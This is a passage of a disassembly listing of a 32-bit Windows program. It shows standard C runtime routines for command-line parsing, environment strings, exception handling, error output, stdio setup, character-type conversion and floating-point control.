arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41FAD3
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41FAD3: ; CODE XREF: sub_41FAA9+20�j
cmp byte ptr [eax], 22h
jnz short loc_41FB1C
loc_41FAD8: ; CODE XREF: sub_41FAA9+58�j
; sub_41FAA9+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41FB0A
test dl, dl
jz short loc_41FB0A
movzx edx, dl
test byte ptr [edx+51B6E1h], 4
jz short loc_41FAFD
inc dword ptr [ecx]
test esi, esi
jz short loc_41FAFD
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41FAFD: ; CODE XREF: sub_41FAA9+46�j
; sub_41FAA9+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41FAD8
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41FAD8
; ---------------------------------------------------------------------------
loc_41FB0A: ; CODE XREF: sub_41FAA9+36�j
; sub_41FAA9+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41FB14
and byte ptr [esi], 0
inc esi
loc_41FB14: ; CODE XREF: sub_41FAA9+65�j
cmp byte ptr [eax], 22h
jnz short loc_41FB5F
inc eax
jmp short loc_41FB5F
; ---------------------------------------------------------------------------
loc_41FB1C: ; CODE XREF: sub_41FAA9+2D�j
; sub_41FAA9+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41FB27
mov dl, [eax]
mov [esi], dl
inc esi
loc_41FB27: ; CODE XREF: sub_41FAA9+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte ptr [ebx+51B6E1h], 4
jz short loc_41FB42
inc dword ptr [ecx]
test esi, esi
jz short loc_41FB41
mov bl, [eax]
mov [esi], bl
inc esi
loc_41FB41: ; CODE XREF: sub_41FAA9+91�j
inc eax
loc_41FB42: ; CODE XREF: sub_41FAA9+8B�j
cmp dl, 20h
jz short loc_41FB50
test dl, dl
jz short loc_41FB54
cmp dl, 9
jnz short loc_41FB1C
loc_41FB50: ; CODE XREF: sub_41FAA9+9C�j
test dl, dl
jnz short loc_41FB57
loc_41FB54: ; CODE XREF: sub_41FAA9+A0�j
dec eax
jmp short loc_41FB5F
; ---------------------------------------------------------------------------
loc_41FB57: ; CODE XREF: sub_41FAA9+A9�j
test esi, esi
jz short loc_41FB5F
and byte ptr [esi-1], 0
loc_41FB5F: ; CODE XREF: sub_41FAA9+6E�j
; sub_41FAA9+71�j ...
and [ebp+arg_10], 0
loc_41FB63: ; CODE XREF: sub_41FAA9+19E�j
cmp byte ptr [eax], 0
jz loc_41FC4C
loc_41FB6C: ; CODE XREF: sub_41FAA9+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41FB78
cmp dl, 9
jnz short loc_41FB7B
loc_41FB78: ; CODE XREF: sub_41FAA9+C8�j
inc eax
jmp short loc_41FB6C
; ---------------------------------------------------------------------------
loc_41FB7B: ; CODE XREF: sub_41FAA9+CD�j
cmp byte ptr [eax], 0
jz loc_41FC4C
test edi, edi
jz short loc_41FB90
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41FB90: ; CODE XREF: sub_41FAA9+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41FB95: ; CODE XREF: sub_41FAA9+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41FB9E: ; CODE XREF: sub_41FAA9+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41FBA7
inc eax
inc ebx
jmp short loc_41FB9E
; ---------------------------------------------------------------------------
loc_41FBA7: ; CODE XREF: sub_41FAA9+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41FBD8
test bl, 1
jnz short loc_41FBD6
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41FBC5
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41FBC5
mov eax, edx
jmp short loc_41FBC8
; ---------------------------------------------------------------------------
loc_41FBC5: ; CODE XREF: sub_41FAA9+10D�j
; sub_41FAA9+116�j
mov [ebp+arg_0], edi
loc_41FBC8: ; CODE XREF: sub_41FAA9+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41FBD6: ; CODE XREF: sub_41FAA9+106�j
shr ebx, 1
loc_41FBD8: ; CODE XREF: sub_41FAA9+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41FBED
inc ebx
loc_41FBE0: ; CODE XREF: sub_41FAA9+142�j
test esi, esi
jz short loc_41FBE8
mov byte ptr [esi], 5Ch
inc esi
loc_41FBE8: ; CODE XREF: sub_41FAA9+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41FBE0
loc_41FBED: ; CODE XREF: sub_41FAA9+134�j
mov dl, [eax]
test dl, dl
jz short loc_41FC3D
cmp [ebp+arg_10], 0
jnz short loc_41FC03
cmp dl, 20h
jz short loc_41FC3D
cmp dl, 9
jz short loc_41FC3D
loc_41FC03: ; CODE XREF: sub_41FAA9+14E�j
cmp [ebp+arg_0], 0
jz short loc_41FC37
test esi, esi
jz short loc_41FC26
movzx ebx, dl
test byte ptr [ebx+51B6E1h], 4
jz short loc_41FC1F
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41FC1F: ; CODE XREF: sub_41FAA9+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41FC35
; ---------------------------------------------------------------------------
loc_41FC26: ; CODE XREF: sub_41FAA9+162�j
movzx edx, dl
test byte ptr [edx+51B6E1h], 4
jz short loc_41FC35
inc eax
inc dword ptr [ecx]
loc_41FC35: ; CODE XREF: sub_41FAA9+17B�j
; sub_41FAA9+187�j
inc dword ptr [ecx]
loc_41FC37: ; CODE XREF: sub_41FAA9+15E�j
inc eax
jmp loc_41FB95
; ---------------------------------------------------------------------------
loc_41FC3D: ; CODE XREF: sub_41FAA9+148�j
; sub_41FAA9+153�j ...
test esi, esi
jz short loc_41FC45
and byte ptr [esi], 0
inc esi
loc_41FC45: ; CODE XREF: sub_41FAA9+196�j
inc dword ptr [ecx]
jmp loc_41FB63
; ---------------------------------------------------------------------------
loc_41FC4C: ; CODE XREF: sub_41FAA9+BD�j
; sub_41FAA9+D5�j
test edi, edi
jz short loc_41FC53
and dword ptr [edi], 0
loc_41FC53: ; CODE XREF: sub_41FAA9+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41FAA9 endp
; =============== S U B R O U T I N E =======================================
sub_41FC5D proc near ; CODE XREF: .text:0041A3E5�p
lpMem = dword ptr -8
cchWideChar = dword ptr -4
push ecx
push ecx
mov eax, dword ptr byte_445EDC+0D45A0h
push ebx
push ebp
mov ebp, GetEnvironmentStringsW
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41FCAB
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41FC8C
mov dword ptr byte_445EDC+0D45A0h, 1
jmp short loc_41FCB4
; ---------------------------------------------------------------------------
loc_41FC8C: ; CODE XREF: sub_41FC5D+21�j
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_41FD86
mov dword ptr byte_445EDC+0D45A0h, 2
jmp loc_41FD3A
; ---------------------------------------------------------------------------
loc_41FCAB: ; CODE XREF: sub_41FC5D+19�j
cmp eax, 1
jnz loc_41FD35
loc_41FCB4: ; CODE XREF: sub_41FC5D+2D�j
cmp esi, ebx
jnz short loc_41FCC4
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41FD86
loc_41FCC4: ; CODE XREF: sub_41FC5D+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41FCD9
loc_41FCCB: ; CODE XREF: sub_41FC5D+73�j
; sub_41FC5D+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41FCCB
inc eax
inc eax
cmp [eax], bx
jnz short loc_41FCCB
loc_41FCD9: ; CODE XREF: sub_41FC5D+6C�j
sub eax, esi
mov edi, WideCharToMultiByte
sar eax, 1
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
inc eax
push ebx ; cbMultiByte
push ebx ; lpMultiByteStr
push eax ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
mov [esp+38h+cchWideChar], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41FD2A
push ebp
call sub_418175
cmp eax, ebx
pop ecx
mov [esp+18h+lpMem], eax
jz short loc_41FD2A
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push ebp ; cbMultiByte
push eax ; lpMultiByteStr
push [esp+28h+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41FD26
push [esp+18h+lpMem] ; lpMem
call sub_418227
pop ecx
mov [esp+18h+lpMem], ebx
loc_41FD26: ; CODE XREF: sub_41FC5D+B9�j
mov ebx, [esp+18h+lpMem]
loc_41FD2A: ; CODE XREF: sub_41FC5D+99�j
; sub_41FC5D+A8�j
push esi ; LPWCH
call FreeEnvironmentStringsW ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41FD88
; ---------------------------------------------------------------------------
loc_41FD35: ; CODE XREF: sub_41FC5D+51�j
cmp eax, 2
jnz short loc_41FD86
loc_41FD3A: ; CODE XREF: sub_41FC5D+49�j
cmp edi, ebx
jnz short loc_41FD4A
call GetEnvironmentStrings ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_41FD86
loc_41FD4A: ; CODE XREF: sub_41FC5D+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41FD5A
loc_41FD50: ; CODE XREF: sub_41FC5D+F6�j
; sub_41FC5D+FB�j
inc eax
cmp [eax], bl
jnz short loc_41FD50
inc eax
cmp [eax], bl
jnz short loc_41FD50
loc_41FD5A: ; CODE XREF: sub_41FC5D+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_418175
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41FD70
xor esi, esi
jmp short loc_41FD7B
; ---------------------------------------------------------------------------
loc_41FD70: ; CODE XREF: sub_41FC5D+10D�j
push ebp
push edi
push esi
call sub_417A40
add esp, 0Ch
loc_41FD7B: ; CODE XREF: sub_41FC5D+111�j
push edi ; LPCH
call FreeEnvironmentStringsA ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41FD88
; ---------------------------------------------------------------------------
loc_41FD86: ; CODE XREF: sub_41FC5D+39�j
; sub_41FC5D+61�j ...
xor eax, eax
loc_41FD88: ; CODE XREF: sub_41FC5D+D6�j
; sub_41FC5D+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41FC5D endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FD98 proc near ; DATA XREF: .text:0041A370�o
; sub_41D2D6+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41FE38
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41FDCB: ; CODE XREF: sub_41FD98+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41FE31
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41FE1F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41FE1F
js short loc_41FE2A
mov edi, [ebx+8]
push ebx
call sub_41878C
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4187CE
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_418862
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41FE1F: ; CODE XREF: sub_41FD98+40�j
; sub_41FD98+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41FDCB
; ---------------------------------------------------------------------------
loc_41FE2A: ; CODE XREF: sub_41FD98+54�j
mov eax, 0
jmp short loc_41FE4D
; ---------------------------------------------------------------------------
loc_41FE31: ; CODE XREF: sub_41FD98+36�j
mov eax, 1
jmp short loc_41FE4D
; ---------------------------------------------------------------------------
loc_41FE38: ; CODE XREF: sub_41FD98+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4187CE
add esp, 8
pop ebp
mov eax, 1
loc_41FE4D: ; CODE XREF: sub_41FD98+97�j
; sub_41FD98+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41FD98 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4187CE
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41FE70 proc near ; CODE XREF: sub_41A45C+9�p
; sub_41A481+9�p
mov eax, dword ptr byte_445EDC+0D4438h
cmp eax, 1
jz short loc_41FE87
test eax, eax
jnz short locret_41FEA8
cmp dword ptr unk_43DD24, 1
jnz short locret_41FEA8
loc_41FE87: ; CODE XREF: sub_41FE70+8�j
push 0FCh ; NumberOfBytesWritten
call sub_41FEA9
mov eax, dword ptr byte_445EDC+0D45A4h
pop ecx
test eax, eax
jz short loc_41FE9D
call eax
loc_41FE9D: ; CODE XREF: sub_41FE70+29�j
push 0FFh ; NumberOfBytesWritten
call sub_41FEA9
pop ecx
locret_41FEA8: ; CODE XREF: sub_41FE70+C�j
; sub_41FE70+15�j
retn
sub_41FE70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41FEA9(DWORD NumberOfBytesWritten)
sub_41FEA9 proc near ; CODE XREF: sub_41A45C+12�p
; sub_41A481+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
NumberOfBytesWritten= dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+NumberOfBytesWritten]
xor ecx, ecx
mov eax, 4403B8h
loc_41FEBC: ; CODE XREF: sub_41FEA9+20�j
cmp edx, [eax]
jz short loc_41FECB
add eax, 8
inc ecx
cmp eax, 440448h
jl short loc_41FEBC
loc_41FECB: ; CODE XREF: sub_41FEA9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, [esi+4403B8h]
jnz loc_41FFF9
mov eax, dword ptr byte_445EDC+0D4438h
cmp eax, 1
jz loc_41FFD3
test eax, eax
jnz short loc_41FEFC
cmp dword ptr unk_43DD24, 1
jz loc_41FFD3
loc_41FEFC: ; CODE XREF: sub_41FEA9+44�j
cmp edx, 0FCh
jz loc_41FFF9
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword ptr byte_424084+4
test eax, eax
jnz short loc_41FF33
lea eax, [ebp+var_1A4]
push 424BB4h
push eax
call sub_417FE0
pop ecx
pop ecx
loc_41FF33: ; CODE XREF: sub_41FEA9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4180D0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41FF76
lea eax, [ebp+var_1A4]
push eax
call sub_4180D0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push 424BB0h
push edi
call sub_419300
add esp, 10h
loc_41FF76: ; CODE XREF: sub_41FEA9+A2�j
lea eax, [ebp+var_A0]
push 424B94h
push eax
call sub_417FE0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_417FF0
lea eax, [ebp+var_A0]
push 424B90h
push eax
call sub_417FF0
push dword ptr [esi+4403BCh]
lea eax, [ebp+var_A0]
push eax
call sub_417FF0
push 12010h
lea eax, [ebp+var_A0]
push 424B68h
push eax
call sub_421681
add esp, 2Ch
pop edi
jmp short loc_41FFF9
; ---------------------------------------------------------------------------
loc_41FFD3: ; CODE XREF: sub_41FEA9+3C�j
; sub_41FEA9+4D�j
lea eax, [ebp+NumberOfBytesWritten]
lea esi, [esi+4403BCh]
push 0 ; lpOverlapped
push eax ; lpNumberOfBytesWritten
push dword ptr [esi]
call sub_4180D0
pop ecx
push eax ; nNumberOfBytesToWrite
push dword ptr [esi] ; lpBuffer
push 0FFFFFFF4h ; nStdHandle
call GetStdHandle ; GetStdHandle
push eax ; hFile
call WriteFile ; WriteFile
loc_41FFF9: ; CODE XREF: sub_41FEA9+2E�j
; sub_41FEA9+59�j ...
pop esi
leave
retn
sub_41FEA9 endp
; =============== S U B R O U T I N E =======================================
sub_41FFFC proc near ; CODE XREF: sub_41A4A5+6C�p
; sub_41E651+32�p ...
arg_0 = dword ptr 4
inc dword ptr byte_445EDC+0D45A8h
push 1000h
call sub_418175
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_420025
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_420036
; ---------------------------------------------------------------------------
loc_420025: ; CODE XREF: sub_41FFFC+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_420036: ; CODE XREF: sub_41FFFC+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41FFFC endp
; =============== S U B R O U T I N E =======================================
sub_420040 proc near ; CODE XREF: sub_41A4A5+61�p
; sub_41F6B1+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword ptr byte_445EDC+0D5A24h
jb short loc_42004F
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42004F: ; CODE XREF: sub_420040+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword ptr byte_445EDC+0D5924h[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_420040 endp
; ---------------------------------------------------------------------------
mov eax, dword ptr byte_445EDC+0D56E4h
push esi
push 14h
test eax, eax
pop esi
jnz short loc_42007A
mov eax, 200h
jmp short loc_420080
; ---------------------------------------------------------------------------
loc_42007A: ; CODE XREF: .text:00420071�j
cmp eax, esi
jge short loc_420085
mov eax, esi
loc_420080: ; CODE XREF: .text:00420078�j
mov dword ptr byte_445EDC+0D56E4h, eax
loc_420085: ; CODE XREF: .text:0042007C�j
push 4
push eax
call sub_42170A
pop ecx
mov dword ptr byte_445EDC+0D46DCh, eax
test eax, eax
pop ecx
jnz short loc_4200B9
push 4
push esi
mov dword ptr byte_445EDC+0D56E4h, esi
call sub_42170A
pop ecx
mov dword ptr byte_445EDC+0D46DCh, eax
test eax, eax
pop ecx
jnz short loc_4200B9
push 1Ah
call sub_41A45C
pop ecx
loc_4200B9: ; CODE XREF: .text:00420096�j
; .text:004200AF�j
xor ecx, ecx
mov eax, offset off_440448
loc_4200C0: ; CODE XREF: .text:004200D4�j
mov edx, dword ptr byte_445EDC+0D46DCh
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset unk_4406C8
jl short loc_4200C0
xor edx, edx
mov ecx, offset unk_440458
loc_4200DD: ; CODE XREF: .text:00420107�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, dword ptr byte_445EDC+0D5924h[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_4200FA
test eax, eax
jnz short loc_4200FD
loc_4200FA: ; CODE XREF: .text:004200F4�j
or dword ptr [ecx], 0FFFFFFFFh
loc_4200FD: ; CODE XREF: .text:004200F8�j
add ecx, 20h
inc edx
cmp ecx, offset unk_4404B8
jl short loc_4200DD
pop esi
retn
; ---------------------------------------------------------------------------
call sub_41E5DB
cmp byte_445EDC+0D4424h, 0
jz short locret_42011E
jmp loc_4217BB
; ---------------------------------------------------------------------------
locret_42011E: ; CODE XREF: .text:00420117�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_42011F(LPSTR UsedDefaultChar, const WCHAR WideCharStr)
sub_42011F proc near ; CODE XREF: sub_41A5BA+2D4�p
; sub_41A5BA+6B3�p
UsedDefaultChar = dword ptr 8
WideCharStr = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+UsedDefaultChar]
test eax, eax
jnz short loc_42012B
pop ebp
retn
; ---------------------------------------------------------------------------
loc_42012B: ; CODE XREF: sub_42011F+8�j
cmp dword ptr byte_445EDC+0D4474h, 0
jnz short loc_420146
mov cx, [ebp+WideCharStr]
cmp cx, 0FFh
ja short loc_420178
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420146: ; CODE XREF: sub_42011F+13�j
lea ecx, [ebp+UsedDefaultChar]
and [ebp+UsedDefaultChar], 0
push ecx ; lpUsedDefaultChar
push 0 ; lpDefaultChar
push cbMultiByte ; cbMultiByte
push eax ; lpMultiByteStr
lea eax, [ebp+WideCharStr]
push 1 ; cchWideChar
push eax ; lpWideCharStr
push 220h ; dwFlags
push dword ptr byte_445EDC+0D4484h ; CodePage
call WideCharToMultiByte ; WideCharToMultiByte
test eax, eax
jz short loc_420178
cmp [ebp+UsedDefaultChar], 0
jz short loc_420185
loc_420178: ; CODE XREF: sub_42011F+1E�j
; sub_42011F+51�j
mov dword ptr byte_445EDC+0D43E4h, 2Ah
or eax, 0FFFFFFFFh
loc_420185: ; CODE XREF: sub_42011F+57�j
pop ebp
retn
sub_42011F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_420187(DWORD dwInfoType, LPCSTR lpMultiByteStr, int cbMultiByte, LPWORD lpCharType, UINT CodePage, LCID Locale, int)
sub_420187 proc near ; CODE XREF: sub_41ADC4+5E�p
; sub_41F41F+9A�p
var_24 = dword ptr -24h
cchWideChar = dword ptr -20h
CharType = word ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
dwInfoType = dword ptr 8
lpMultiByteStr = dword ptr 0Ch
cbMultiByte = dword ptr 10h
lpCharType = dword ptr 14h
CodePage = dword ptr 18h
Locale = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push 424BD0h
push offset sub_41FD98
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, dword ptr byte_445EDC+0D45ACh
xor ebx, ebx
cmp eax, ebx
jnz short loc_4201F6
lea eax, [ebp+CharType]
push eax ; lpCharType
push 1
pop esi
push esi ; cchSrc
push offset SrcStr ; lpSrcStr
push esi ; dwInfoType
call GetStringTypeW ; GetStringTypeW
test eax, eax
jz short loc_4201D4
mov eax, esi
jmp short loc_4201F1
; ---------------------------------------------------------------------------
loc_4201D4: ; CODE XREF: sub_420187+47�j
lea eax, [ebp+CharType]
push eax ; lpCharType
push esi ; cchSrc
push offset byte_440FAC ; lpSrcStr
push esi ; dwInfoType
push ebx ; Locale
call GetStringTypeA ; GetStringTypeA
test eax, eax
jz loc_4202BC
push 2
pop eax
loc_4201F1: ; CODE XREF: sub_420187+4B�j
mov dword ptr byte_445EDC+0D45ACh, eax
loc_4201F6: ; CODE XREF: sub_420187+2F�j
cmp eax, 2
jnz short loc_42021F
mov eax, [ebp+Locale]
cmp eax, ebx
jnz short loc_420207
mov eax, dword ptr byte_445EDC+0D4474h
loc_420207: ; CODE XREF: sub_420187+79�j
push [ebp+lpCharType] ; lpCharType
push [ebp+cbMultiByte] ; cchSrc
push [ebp+lpMultiByteStr] ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
push eax ; Locale
call GetStringTypeA ; GetStringTypeA
jmp loc_4202BE
; ---------------------------------------------------------------------------
loc_42021F: ; CODE XREF: sub_420187+72�j
cmp eax, 1
jnz loc_4202BC
cmp [ebp+CodePage], ebx
jnz short loc_420235
mov eax, dword ptr byte_445EDC+0D4484h
mov [ebp+CodePage], eax
loc_420235: ; CODE XREF: sub_420187+A4�j
push ebx ; cchWideChar
push ebx ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
mov [ebp+cchWideChar], eax
cmp eax, ebx
jz short loc_4202BC
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_417F30
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4179E0
add esp, 0Ch
jmp short loc_42028B
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_42028B: ; CODE XREF: sub_420187+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_4202BC
push [ebp+cchWideChar] ; cchWideChar
push esi ; lpWideCharStr
push [ebp+cbMultiByte] ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push 1 ; dwFlags
push [ebp+CodePage] ; CodePage
call MultiByteToWideChar ; MultiByteToWideChar
cmp eax, ebx
jz short loc_4202BC
push [ebp+lpCharType] ; lpCharType
push eax ; cchSrc
push esi ; lpSrcStr
push [ebp+dwInfoType] ; dwInfoType
call GetStringTypeW ; GetStringTypeW
jmp short loc_4202BE
; ---------------------------------------------------------------------------
loc_4202BC: ; CODE XREF: sub_420187+61�j
; sub_420187+9B�j ...
xor eax, eax
loc_4202BE: ; CODE XREF: sub_420187+93�j
; sub_420187+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420187 endp
; =============== S U B R O U T I N E =======================================
sub_4202D0 proc near ; CODE XREF: sub_41C7EF+52�p
xor eax, eax
retn
sub_4202D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4202D3 proc near ; CODE XREF: sub_420308+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_42031E
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_4203B0
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_4202D3 endp
; =============== S U B R O U T I N E =======================================
sub_420308 proc near ; CODE XREF: sub_41CADB+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_4202D3
pop ecx
pop ecx
retn
sub_420308 endp
; =============== S U B R O U T I N E =======================================
sub_42031E proc near ; CODE XREF: sub_4202D3+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_42032F
push 10h
pop eax
loc_42032F: ; CODE XREF: sub_42031E+C�j
test bl, 4
jz short loc_420336
or al, 8
loc_420336: ; CODE XREF: sub_42031E+14�j
test bl, 8
jz short loc_42033D
or al, 4
loc_42033D: ; CODE XREF: sub_42031E+1B�j
test bl, 10h
jz short loc_420344
or al, 2
loc_420344: ; CODE XREF: sub_42031E+22�j
test bl, 20h
jz short loc_42034B
or al, 1
loc_42034B: ; CODE XREF: sub_42031E+29�j
test bl, 2
jz short loc_420355
or eax, 80000h
loc_420355: ; CODE XREF: sub_42031E+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_42038D
cmp edx, 400h
jz short loc_42038A
cmp edx, 800h
jz short loc_420386
cmp edx, esi
jnz short loc_42038D
or eax, edi
jmp short loc_42038D
; ---------------------------------------------------------------------------
loc_420386: ; CODE XREF: sub_42031E+5E�j
or eax, ebp
jmp short loc_42038D
; ---------------------------------------------------------------------------
loc_42038A: ; CODE XREF: sub_42031E+56�j
or ah, 1
loc_42038D: ; CODE XREF: sub_42031E+4E�j
; sub_42031E+62�j ...
and ecx, edi
pop esi
jz short loc_42039D
cmp ecx, ebp
jnz short loc_4203A2
or eax, 10000h
jmp short loc_4203A2
; ---------------------------------------------------------------------------
loc_42039D: ; CODE XREF: sub_42031E+72�j
or eax, 20000h
loc_4203A2: ; CODE XREF: sub_42031E+76�j
